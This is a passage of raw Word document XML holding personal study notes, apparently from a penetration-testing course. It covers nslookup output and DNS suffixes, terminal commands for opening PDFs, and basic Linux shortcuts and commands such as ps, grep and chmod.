    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Address: 172.16.6.240 (the first entry) is the IP address of the DNS server that nslookup is querying, as hinted by the "Server: Unknown" thing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003387">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But it's showing the name as UnKnown because it can't reverse-resolve the IP 172.16.6.240 to a hostname using a PTR record.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003388">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from XXXXXXXXX 27.4.1. Situational Awareness</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003389">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000338A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you provide just a hostname (like INTERNALSRV1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000338B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="756"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nslookup may append a default DNS suffix based on your system's configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000338C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="756"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For example, if your system is joined to the beyond.com domain or has beyond.com listed in its DNS search suffix list, it will try INTERNALSRV1.beyond.com.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000338D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000338E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is useful when you see a machine on Bloodhound but don't know it's IP</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000338F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000339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91">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003392">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5ycpbmxbmtpd" w:id="456"/>
      <w:bookmarkEnd w:id="456"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PDF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003393">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003394">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to open pdf from terminal:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003395">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="126"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">open [file_name.pdf]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003396">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="126"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">evince [file_name.pdf]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003397">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="126"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">xdg-open [file_name.pdf]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003398">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003399">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000339A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000339B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000339C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000339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9E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000339F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_roxdx2f8hdv5" w:id="457"/>
      <w:bookmarkEnd w:id="457"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux General</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="168"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">amd64 just means 64-bit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="168"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">386 means 32-bit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033A2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="168"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">aarch64 means you're on an ARM 64-bit architecture</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033A3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033A4">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tabs in Terminal:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033A5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="201"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can use CTRL + T to add tabs in the terminal </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033A6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="201"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can double click on a tab to re-name it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033A7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033A8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Check if a specific service is running:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="662"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ps aux | grep [name_of_service]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033AA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033AB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Navigate word by word:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033AC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="353"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Alt+F</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: moves one word forward</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033AD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="353"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Alt+B</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: moves one word back</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033AE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033AF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Delete Entire Words:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033B0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="469"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + W</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Deletes the word to the left of the cursor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033B1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="469"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Alt + D Or ESC + D:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Deletes the word to the right of the cursor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033B2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033B3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Delete Entire Line:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + U</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Deletes everything to the left of the cursor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + K</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Deletes everything to the right of the cursor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033B6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033B7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033B8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you try and run an executable and get this: "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">zsh: permission denied:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1183"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Do this: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +x [fileName]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033BA">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033BB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
